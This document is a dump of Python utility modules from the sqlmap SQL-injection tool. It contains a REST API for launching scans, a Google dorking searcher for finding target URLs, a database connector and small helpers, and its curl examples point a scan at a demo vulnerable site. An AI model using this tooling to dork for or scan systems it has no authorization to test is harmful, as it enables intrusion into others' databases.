'%s(%r, %r, %r)' % (type(self).__name__, self.start, self.stop, self.step) def __len__(self): return self._len() def _len(self): return max(0, int((self.stop - self.start) / self.step)) def __contains__(self, value): return (self.start <= value < self.stop) and (value - self.start) % self.step == 0 def __getitem__(self, index): if isinstance(index, slice): start, stop, step = index.indices(self._len()) return xrange(self._index(start), self._index(stop), step*self.step) elif isinstance(index, (int, long)): if index < 0: fixed_index = index + self._len() else: fixed_index = index if not 0 <= fixed_index < self._len(): raise IndexError("Index %d out of %r" % (index, self)) return self._index(fixed_index) else: raise TypeError("xrange indices must be slices or integers") def _index(self, i): return self.start + self.step * i
2,464
Python
.py
69
26.898551
94
0.557846
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,987
api.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/api.py
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import logging import os import shutil import sqlite3 import sys import tempfile import time from subprocess import PIPE from lib.core.common import unArrayizeValue from lib.core.convert import base64pickle from lib.core.convert import hexencode from lib.core.convert import dejsonize from lib.core.convert import jsonize from lib.core.data import conf from lib.core.data import kb from lib.core.data import paths from lib.core.data import logger from lib.core.datatype import AttribDict from lib.core.defaults import _defaults from lib.core.enums import CONTENT_STATUS from lib.core.enums import PART_RUN_CONTENT_TYPES from lib.core.log import LOGGER_HANDLER from lib.core.optiondict import optDict from lib.core.subprocessng import Popen from thirdparty.bottle.bottle import error as return_error from thirdparty.bottle.bottle import get from thirdparty.bottle.bottle import hook from thirdparty.bottle.bottle import post from thirdparty.bottle.bottle import request from thirdparty.bottle.bottle import response from thirdparty.bottle.bottle import run RESTAPI_SERVER_HOST = "127.0.0.1" RESTAPI_SERVER_PORT = 8775 # global settings class DataStore(object): admin_id = "" current_db = None tasks = dict() # API objects class Database(object): filepath = None def __init__(self, database=None): self.database = self.filepath if database is None else database self.connection = None self.cursor = None def connect(self, who="server"): self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None) self.cursor = self.connection.cursor() logger.debug("REST-JSON API %s connected to IPC database" % who) def disconnect(self): self.cursor.close() self.connection.close() def commit(self): self.connection.commit() def execute(self, statement, arguments=None): if arguments: self.cursor.execute(statement, arguments) else: self.cursor.execute(statement) if statement.lstrip().upper().startswith("SELECT"): return self.cursor.fetchall() def init(self): self.execute("CREATE TABLE logs(" "id INTEGER PRIMARY KEY AUTOINCREMENT, " "taskid INTEGER, time TEXT, " "level TEXT, message TEXT" ")") self.execute("CREATE TABLE data(" "id INTEGER PRIMARY KEY AUTOINCREMENT, " "taskid INTEGER, status INTEGER, " "content_type INTEGER, value TEXT" ")") self.execute("CREATE TABLE errors(" "id INTEGER PRIMARY KEY AUTOINCREMENT, " "taskid INTEGER, error TEXT" ")") class Task(object): def __init__(self, taskid): self.process = None self.temporary_directory = False self.output_directory = None self.options = None self._original_options = None self.initialize_options(taskid) def initialize_options(self, taskid): datatype = {"boolean": False, "string": None, "integer": None, "float": None} self.options = AttribDict() for _ in optDict: for name, type_ in optDict[_].items(): type_ = unArrayizeValue(type_) self.options[name] = _defaults.get(name, datatype[type_]) # Let sqlmap engine knows it is getting called by the API, # the task ID and the file path of the IPC database self.options.api = True self.options.taskid = taskid self.options.database = Database.filepath # Enforce batch mode and disable coloring and ETA self.options.batch = True self.options.disableColoring = True self.options.eta = False self._original_options = AttribDict(self.options) def set_option(self, option, value): self.options[option] = value def get_option(self, option): return self.options[option] def get_options(self): return self.options def reset_options(self): self.options = AttribDict(self._original_options) def set_output_directory(self): if self.get_option("outputDir"): if os.path.isdir(self.get_option("outputDir")): self.output_directory = self.get_option("outputDir") else: try: os.makedirs(self.get_option("outputDir")) self.output_directory = self.get_option("outputDir") except OSError: pass if not self.output_directory or not os.path.isdir(self.output_directory): self.output_directory = tempfile.mkdtemp(prefix="sqlmapoutput-") self.temporary_directory = True self.set_option("outputDir", self.output_directory) def clean_filesystem(self): if self.output_directory and self.temporary_directory: shutil.rmtree(self.output_directory) def engine_start(self): self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)], shell=False, stdin=PIPE, close_fds=False) def engine_stop(self): if self.process: return self.process.terminate() else: return None def engine_process(self): return self.process def engine_kill(self): if self.process: return self.process.kill() else: return None def engine_get_id(self): if self.process: return self.process.pid else: return None def engine_get_returncode(self): if self.process: self.process.poll() return self.process.returncode else: return None def engine_has_terminated(self): return isinstance(self.engine_get_returncode(), int) # Wrapper functions for sqlmap engine class StdDbOut(object): def __init__(self, taskid, messagetype="stdout"): # Overwrite system standard output and standard error to write # to an IPC database self.messagetype = messagetype self.taskid = taskid if self.messagetype == "stdout": sys.stdout = self else: sys.stderr = self def write(self, value, status=CONTENT_STATUS.IN_PROGRESS, content_type=None): if self.messagetype == "stdout": if content_type is None: if kb.partRun is not None: content_type = PART_RUN_CONTENT_TYPES.get(kb.partRun) else: # Ignore all non-relevant messages return output = conf.database_cursor.execute( "SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?", (self.taskid, content_type)) # Delete partial output from IPC database if we have got a complete output if status == CONTENT_STATUS.COMPLETE: if len(output) > 0: for index in xrange(len(output)): conf.database_cursor.execute("DELETE FROM data WHERE id = ?", (output[index][0],)) conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value))) if kb.partRun: kb.partRun = None elif status == CONTENT_STATUS.IN_PROGRESS: if len(output) == 0: conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value))) else: new_value = "%s%s" % (dejsonize(output[0][2]), value) conf.database_cursor.execute("UPDATE data SET value = ? WHERE id = ?", (jsonize(new_value), output[0][0])) else: conf.database_cursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", (self.taskid, str(value) if value else "")) def flush(self): pass def close(self): pass def seek(self): pass class LogRecorder(logging.StreamHandler): def emit(self, record): """ Record emitted events to IPC database for asynchronous I/O communication with the parent process """ conf.database_cursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", (conf.taskid, time.strftime("%X"), record.levelname, record.msg % record.args if record.args else record.msg)) def setRestAPILog(): if hasattr(conf, "api"): conf.database_cursor = Database(conf.database) conf.database_cursor.connect("client") # Set a logging handler that writes log messages to a IPC database logger.removeHandler(LOGGER_HANDLER) LOGGER_RECORDER = LogRecorder() logger.addHandler(LOGGER_RECORDER) # Generic functions def is_admin(taskid): return DataStore.admin_id == taskid @hook("after_request") def security_headers(json_header=True): """ Set some headers across all HTTP responses """ response.headers["Server"] = "Server" response.headers["X-Content-Type-Options"] = "nosniff" response.headers["X-Frame-Options"] = "DENY" response.headers["X-XSS-Protection"] = "1; mode=block" response.headers["Pragma"] = "no-cache" response.headers["Cache-Control"] = "no-cache" response.headers["Expires"] = "0" if json_header: response.content_type = "application/json; charset=UTF-8" ############################## # HTTP Status Code functions # ############################## @return_error(401) # Access Denied def error401(error=None): security_headers(False) return "Access denied" @return_error(404) # Not Found def error404(error=None): security_headers(False) return "Nothing here" @return_error(405) # Method Not Allowed (e.g. when requesting a POST method via GET) def error405(error=None): security_headers(False) return "Method not allowed" @return_error(500) # Internal Server Error def error500(error=None): security_headers(False) return "Internal server error" ############################# # Task management functions # ############################# # Users' methods @get("/task/new") def task_new(): """ Create new task ID """ taskid = hexencode(os.urandom(8)) DataStore.tasks[taskid] = Task(taskid) logger.debug(" [%s] Created new task" % taskid) return jsonize({"success": True, "taskid": taskid}) @get("/task/<taskid>/delete") def task_delete(taskid): """ Delete own task ID """ if taskid in DataStore.tasks: DataStore.tasks[taskid].clean_filesystem() DataStore.tasks.pop(taskid) logger.debug("[%s] Deleted task" % taskid) return jsonize({"success": True}) else: logger.warning("[%s] Invalid task ID provided to task_delete()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) ################### # Admin functions # ################### @get("/admin/<taskid>/list") def task_list(taskid): """ List task pull """ if is_admin(taskid): logger.debug("[%s] Listed task pool" % taskid) tasks = list(DataStore.tasks) return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) else: logger.warning("[%s] Unauthorized call to task_list()" % taskid) return jsonize({"success": False, "message": "Unauthorized"}) @get("/admin/<taskid>/flush") def task_flush(taskid): """ Flush task spool (delete all tasks) """ if is_admin(taskid): for task in DataStore.tasks: DataStore.tasks[task].clean_filesystem() DataStore.tasks = dict() logger.debug("[%s] Flushed task pool" % taskid) return jsonize({"success": True}) else: logger.warning("[%s] Unauthorized call to task_flush()" % taskid) return jsonize({"success": False, "message": "Unauthorized"}) ################################## # sqlmap core interact functions # ################################## # Handle task's options @get("/option/<taskid>/list") def option_list(taskid): """ List options for a certain task ID """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to option_list()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) logger.debug("[%s] Listed task options" % taskid) return jsonize({"success": True, "options": DataStore.tasks[taskid].get_options()}) @post("/option/<taskid>/get") def option_get(taskid): """ Get the value of an option (command line switch) for a certain task ID """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to option_get()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) option = request.json.get("option", "") if option in DataStore.tasks[taskid].options: logger.debug("[%s] Retrieved value for option %s" % (taskid, option)) return jsonize({"success": True, option: DataStore.tasks[taskid].get_option(option)}) else: logger.debug("[%s] Requested value for unknown option %s" % (taskid, option)) return jsonize({"success": False, "message": "Unknown option", option: "not set"}) @post("/option/<taskid>/set") def option_set(taskid): """ Set an option (command line switch) for a certain task ID """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to option_set()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) for option, value in request.json.items(): DataStore.tasks[taskid].set_option(option, value) logger.debug("[%s] Requested to set options" % taskid) return jsonize({"success": True}) # Handle scans @post("/scan/<taskid>/start") def scan_start(taskid): """ Launch a scan """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to scan_start()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) # Initialize sqlmap engine's options with user's provided options, if any for option, value in request.json.items(): DataStore.tasks[taskid].set_option(option, value) # Overwrite output directory value to a temporary directory DataStore.tasks[taskid].set_output_directory() # Launch sqlmap engine in a separate process DataStore.tasks[taskid].engine_start() logger.debug("[%s] Started scan" % taskid) return jsonize({"success": True, "engineid": DataStore.tasks[taskid].engine_get_id()}) @get("/scan/<taskid>/stop") def scan_stop(taskid): """ Stop a scan """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to scan_stop()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) DataStore.tasks[taskid].engine_stop() logger.debug("[%s] Stopped scan" % taskid) return jsonize({"success": True}) @get("/scan/<taskid>/kill") def scan_kill(taskid): """ Kill a scan """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to scan_kill()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) DataStore.tasks[taskid].engine_kill() logger.debug("[%s] Killed scan" % taskid) return jsonize({"success": True}) @get("/scan/<taskid>/status") def scan_status(taskid): """ Returns status of a scan """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to scan_status()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) if DataStore.tasks[taskid].engine_process() is None: status = "not running" else: status = "terminated" if DataStore.tasks[taskid].engine_has_terminated() is True else "running" logger.debug("[%s] Retrieved scan status" % taskid) return jsonize({ "success": True, "status": status, "returncode": DataStore.tasks[taskid].engine_get_returncode() }) @get("/scan/<taskid>/data") def scan_data(taskid): """ Retrieve the data of a scan """ json_data_message = list() json_errors_message = list() if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to scan_data()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) # Read all data from the IPC database for the taskid for status, content_type, value in DataStore.current_db.execute( "SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", (taskid,)): json_data_message.append( {"status": status, "type": content_type, "value": dejsonize(value)}) # Read all error messages from the IPC database for error in DataStore.current_db.execute( "SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", (taskid,)): json_errors_message.append(error) logger.debug("[%s] Retrieved scan data and error messages" % taskid) return jsonize({"success": True, "data": json_data_message, "error": json_errors_message}) # Functions to handle scans' logs @get("/scan/<taskid>/log/<start>/<end>") def scan_log_limited(taskid, start, end): """ Retrieve a subset of log messages """ json_log_messages = list() if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to scan_log_limited()") return jsonize({"success": False, "message": "Invalid task ID"}) if not start.isdigit() or not end.isdigit() or end < start: logger.warning("[%s] Invalid start or end value provided to scan_log_limited()" % taskid) return jsonize({"success": False, "message": "Invalid start or end value, must be digits"}) start = max(1, int(start)) end = max(1, int(end)) # Read a subset of log messages from the IPC database for time_, level, message in DataStore.current_db.execute( ("SELECT time, level, message FROM logs WHERE " "taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC"), (taskid, start, end)): json_log_messages.append({"time": time_, "level": level, "message": message}) logger.debug("[%s] Retrieved scan log messages subset" % taskid) return jsonize({"success": True, "log": json_log_messages}) @get("/scan/<taskid>/log") def scan_log(taskid): """ Retrieve the log messages """ json_log_messages = list() if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to scan_log()") return jsonize({"success": False, "message": "Invalid task ID"}) # Read all log messages from the IPC database for time_, level, message in DataStore.current_db.execute( "SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)): json_log_messages.append({"time": time_, "level": level, "message": message}) logger.debug("[%s] Retrieved scan log messages" % taskid) return jsonize({"success": True, "log": json_log_messages}) # Function to handle files inside the output directory @get("/download/<taskid>/<target>/<filename:path>") def download(taskid, target, filename): """ Download a certain file from the file system """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to download()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) # Prevent file path traversal - the lame way if ".." in target: logger.warning("[%s] Forbidden path (%s)" % (taskid, target)) return jsonize({"success": False, "message": "Forbidden path"}) path = os.path.join(paths.SQLMAP_OUTPUT_PATH, target) if os.path.exists(path): logger.debug("[%s] Retrieved content of file %s" % (taskid, target)) with open(path, 'rb') as inf: file_content = inf.read() return jsonize({"success": True, "file": file_content.encode("base64")}) else: logger.warning("[%s] File does not exist %s" % (taskid, target)) return jsonize({"success": False, "message": "File does not exist"}) def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT): """ REST-JSON API server """ DataStore.admin_id = hexencode(os.urandom(16)) Database.filepath = tempfile.mkstemp(prefix="sqlmapipc-", text=False)[1] logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port)) logger.info("Admin ID: %s" % DataStore.admin_id) logger.debug("IPC database: %s" % Database.filepath) # Initialize IPC database DataStore.current_db = Database() DataStore.current_db.connect() DataStore.current_db.init() # Run RESTful API run(host=host, port=port, quiet=True, debug=False) def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): """ REST-JSON API client """ addr = "http://%s:%d" % (host, port) logger.info("Starting REST-JSON API client to '%s'..." % addr) # TODO: write a simple client with requests, for now use curl from command line logger.error("Not yet implemented, use curl from command line instead for now, for example:") print "\n\t$ curl http://%s:%d/task/new" % (host, port) print ("\t$ curl -H \"Content-Type: application/json\" " "-X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' " "http://%s:%d/scan/:taskid/start") % (host, port) print "\t$ curl http://%s:%d/scan/:taskid/data" % (host, port) print "\t$ curl http://%s:%d/scan/:taskid/log\n" % (host, port)
22,481
Python
.py
529
34.744802
103
0.627877
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,988
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,989
getch.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/getch.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ class _Getch(object): """ Gets a single character from standard input. Does not echo to the screen (reference: http://code.activestate.com/recipes/134892/) """ def __init__(self): try: self.impl = _GetchWindows() except ImportError: try: self.impl = _GetchMacCarbon() except(AttributeError, ImportError): self.impl = _GetchUnix() def __call__(self): return self.impl() class _GetchUnix(object): def __init__(self): import tty def __call__(self): import sys import termios import tty fd = sys.stdin.fileno() old_settings = termios.tcgetattr(fd) try: tty.setraw(sys.stdin.fileno()) ch = sys.stdin.read(1) finally: termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) return ch class _GetchWindows(object): def __init__(self): import msvcrt def __call__(self): import msvcrt return msvcrt.getch() class _GetchMacCarbon(object): """ A function which returns the current ASCII key that is down; if no ASCII key is down, the null string is returned. The page http://www.mactech.com/macintosh-c/chap02-1.html was very helpful in figuring out how to do this. """ def __init__(self): import Carbon Carbon.Evt # see if it has this (in Unix, it doesn't) def __call__(self): import Carbon if Carbon.Evt.EventAvail(0x0008)[0] == 0: # 0x0008 is the keyDownMask return '' else: # # The event contains the following info: # (what,msg,when,where,mod)=Carbon.Evt.GetNextEvent(0x0008)[1] # # The message (msg) contains the ASCII char which is # extracted with the 0x000000FF charCodeMask; this # number is converted to an ASCII character with chr() and # returned # (what, msg, when, where, mod) = Carbon.Evt.GetNextEvent(0x0008)[1] return chr(msg & 0x000000FF) getch = _Getch()
2,305
Python
.py
68
25.602941
78
0.593877
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,990
google.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/google.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import cookielib import httplib import re import socket import urllib import urllib2 from lib.core.common import getUnicode from lib.core.common import readInput from lib.core.common import urlencode from lib.core.data import conf from lib.core.data import logger from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import HTTP_HEADER from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapGenericException from lib.core.settings import GOOGLE_REGEX from lib.core.settings import DUCKDUCKGO_REGEX from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE from lib.core.settings import UNICODE_ENCODING from lib.request.basic import decodePage from lib.request.httpshandler import HTTPSHandler class Google(object): """ This class defines methods used to perform Google dorking (command line option '-g <google dork>' """ def __init__(self, handlers): self._cj = cookielib.CookieJar() handlers.append(urllib2.HTTPCookieProcessor(self._cj)) handlers.append(HTTPSHandler()) self.opener = urllib2.build_opener(*handlers) self.opener.addheaders = conf.httpHeaders try: conn = self.opener.open("http://www.google.com/ncr") conn.info() # retrieve session cookie except Exception, ex: errMsg = "unable to connect to Google ('%s')" % ex raise SqlmapConnectionException(errMsg) def search(self, dork): """ This method performs the effective search on Google providing the google dork and the Google session cookie """ gpage = conf.googlePage if conf.googlePage > 1 else 1 logger.info("using Google result page #%d" % gpage) if not dork: return None url = "http://www.google.com/search?" url += "q=%s&" % urlencode(dork, convall=True) url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search" url += "&start=%d" % ((gpage - 1) * 100) try: conn = self.opener.open(url) requestMsg = "HTTP request:\nGET %s" % url requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) page = conn.read() code = conn.code status = conn.msg responseHeaders = conn.info() page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) responseMsg = "HTTP response (%s - %d):\n" % (status, code) if conf.verbose <= 4: responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) elif conf.verbose > 4: responseMsg += "%s\n%s\n" % (responseHeaders, page) logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) except urllib2.HTTPError, e: try: page = e.read() except socket.timeout: warnMsg = "connection timed out while trying " warnMsg += "to get error page information (%d)" % e.code logger.critical(warnMsg) return None except (urllib2.URLError, socket.error, socket.timeout): errMsg = "unable to connect to Google" raise SqlmapConnectionException(errMsg) retVal = [urllib.unquote(match.group(1)) for match in re.finditer(GOOGLE_REGEX, page, re.I | re.S)] if not retVal and "detected unusual traffic" in page: warnMsg = "Google has detected 'unusual' traffic from " warnMsg += "used IP address disabling further searches" raise SqlmapGenericException(warnMsg) if not retVal: message = "no usable links found. " message += "do you want to (re)try with DuckDuckGo? [Y/n] " output = readInput(message, default="Y") if output.strip().lower() != 'n': url = "https://duckduckgo.com/d.js?" url += "q=%s&p=%d&s=100" % (urlencode(dork, convall=True), gpage) if not conf.randomAgent: self.opener.addheaders = [_ for _ in self.opener.addheaders if _[0].lower() != HTTP_HEADER.USER_AGENT.lower()] self.opener.addheaders.append((HTTP_HEADER.USER_AGENT, "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0")) self.opener.addheaders = [_ for _ in self.opener.addheaders if _[0].lower() != HTTP_HEADER.ACCEPT_ENCODING.lower()] self.opener.addheaders.append((HTTP_HEADER.ACCEPT_ENCODING, HTTP_ACCEPT_ENCODING_HEADER_VALUE)) try: conn = self.opener.open(url) requestMsg = "HTTP request:\nGET %s" % url requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) page = conn.read() code = conn.code status = conn.msg responseHeaders = conn.info() page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type")) responseMsg = "HTTP response (%s - %d):\n" % (status, code) if conf.verbose <= 4: responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING) elif conf.verbose > 4: responseMsg += "%s\n%s\n" % (responseHeaders, page) logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) except urllib2.HTTPError, e: try: page = e.read() except socket.timeout: warnMsg = "connection timed out while trying " warnMsg += "to get error page information (%d)" % e.code logger.critical(warnMsg) return None except (urllib2.URLError, socket.error, socket.timeout): errMsg = "unable to connect to DuckDuckGo" raise SqlmapConnectionException(errMsg) retVal = [urllib.unquote(match.group(1)) for match in re.finditer(DUCKDUCKGO_REGEX, page, re.I | re.S)] return retVal
6,515
Python
.py
129
38.620155
155
0.605131
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,991
sqlalchemy.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/sqlalchemy.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import imp import logging import os import re import sys import warnings _sqlalchemy = None try: f, pathname, desc = imp.find_module("sqlalchemy", sys.path[1:]) _ = imp.load_module("sqlalchemy", f, pathname, desc) if hasattr(_, "dialects"): _sqlalchemy = _ warnings.simplefilter(action="ignore", category=_sqlalchemy.exc.SAWarning) except ImportError: pass try: import MySQLdb # used by SQLAlchemy in case of MySQL warnings.filterwarnings("error", category=MySQLdb.Warning) except ImportError: pass from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapFilePathException from plugins.generic.connector import Connector as GenericConnector class SQLAlchemy(GenericConnector): def __init__(self, dialect=None): GenericConnector.__init__(self) self.dialect = dialect def connect(self): if _sqlalchemy: self.initConnection() try: if not self.port and self.db: if not os.path.exists(self.db): raise SqlmapFilePathException, "the provided database file '%s' does not exist" % self.db _ = conf.direct.split("//", 1) conf.direct = "%s////%s" % (_[0], os.path.abspath(self.db)) if self.dialect: conf.direct = conf.direct.replace(conf.dbms, self.dialect, 1) engine = _sqlalchemy.create_engine(conf.direct, connect_args={'check_same_thread':False} if self.dialect == "sqlite" else {}) self.connector = engine.connect() except SqlmapFilePathException: raise except Exception, msg: raise SqlmapConnectionException("SQLAlchemy connection issue ('%s')" % msg[0]) self.printConnected() def fetchall(self): try: retVal = [] for row in self.cursor.fetchall(): retVal.append(tuple(row)) return retVal except _sqlalchemy.exc.ProgrammingError, msg: logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg.message if hasattr(msg, "message") else msg) return None def execute(self, query): try: self.cursor = self.connector.execute(query) except (_sqlalchemy.exc.OperationalError, _sqlalchemy.exc.ProgrammingError), msg: logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg.message if hasattr(msg, "message") else msg) except _sqlalchemy.exc.InternalError, msg: raise SqlmapConnectionException(msg[1]) def select(self, query): self.execute(query) return self.fetchall()
2,985
Python
.py
71
33.56338
141
0.647465
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,992
progress.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/progress.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.common import getUnicode from lib.core.common import dataToStdout from lib.core.data import conf from lib.core.data import kb class ProgressBar(object): """ This class defines methods to update and draw a progress bar """ def __init__(self, minValue=0, maxValue=10, totalWidth=None): self._progBar = "[]" self._oldProgBar = "" self._min = int(minValue) self._max = int(maxValue) self._span = max(self._max - self._min, 0.001) self._width = totalWidth if totalWidth else conf.progressWidth self._amount = 0 self._times = [] self.update() def _convertSeconds(self, value): seconds = value minutes = seconds / 60 seconds = seconds - (minutes * 60) return "%.2d:%.2d" % (minutes, seconds) def update(self, newAmount=0): """ This method updates the progress bar """ if newAmount < self._min: newAmount = self._min elif newAmount > self._max: newAmount = self._max self._amount = newAmount # Figure out the new percent done, round to an integer diffFromMin = float(self._amount - self._min) percentDone = (diffFromMin / float(self._span)) * 100.0 percentDone = round(percentDone) percentDone = min(100, int(percentDone)) # Figure out how many hash bars the percentage should be allFull = self._width - len("100%% [] %s/%s ETA 00:00" % (self._max, self._max)) numHashes = (percentDone / 100.0) * allFull numHashes = int(round(numHashes)) # Build a progress bar with an arrow of equal signs if numHashes == 0: self._progBar = "[>%s]" % (" " * (allFull - 1)) elif numHashes == allFull: self._progBar = "[%s]" % ("=" * allFull) else: self._progBar = "[%s>%s]" % ("=" * (numHashes - 1), " " * (allFull - numHashes)) # Add the percentage at the beginning of the progress bar percentString = getUnicode(percentDone) + "%" self._progBar = "%s %s" % (percentString, self._progBar) def progress(self, deltaTime, newAmount): """ This method saves item delta time and shows updated progress bar with calculated eta """ if len(self._times) <= ((self._max * 3) / 100) or newAmount > self._max: eta = None else: midTime = sum(self._times) / len(self._times) midTimeWithLatest = (midTime + deltaTime) / 2 eta = midTimeWithLatest * (self._max - newAmount) self._times.append(deltaTime) self.update(newAmount) self.draw(eta) def draw(self, eta=None): """ This method draws the progress bar if it has changed """ if self._progBar != self._oldProgBar: self._oldProgBar = self._progBar dataToStdout("\r%s %d/%d%s" % (self._progBar, self._amount, self._max, (" ETA %s" % self._convertSeconds(int(eta))) if eta is not None else "")) if self._amount >= self._max: if not conf.liveTest: dataToStdout("\r%s\r" % (" " * self._width)) kb.prependFlag = False else: dataToStdout("\n") def __str__(self): """ This method returns the progress bar string """ return getUnicode(self._progBar)
3,654
Python
.py
88
32.090909
157
0.571348
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,993
timeout.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/timeout.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import threading from lib.core.data import logger from lib.core.enums import CUSTOM_LOGGING def timeout(func, args=(), kwargs={}, duration=1, default=None): class InterruptableThread(threading.Thread): def __init__(self): threading.Thread.__init__(self) self.result = None def run(self): try: self.result = func(*args, **kwargs) except Exception, msg: logger.log(CUSTOM_LOGGING.TRAFFIC_IN, msg) self.result = default thread = InterruptableThread() thread.start() thread.join(duration) if thread.isAlive(): return default else: return thread.result
850
Python
.py
26
25.576923
64
0.636475
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,994
headers.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/parse/headers.py
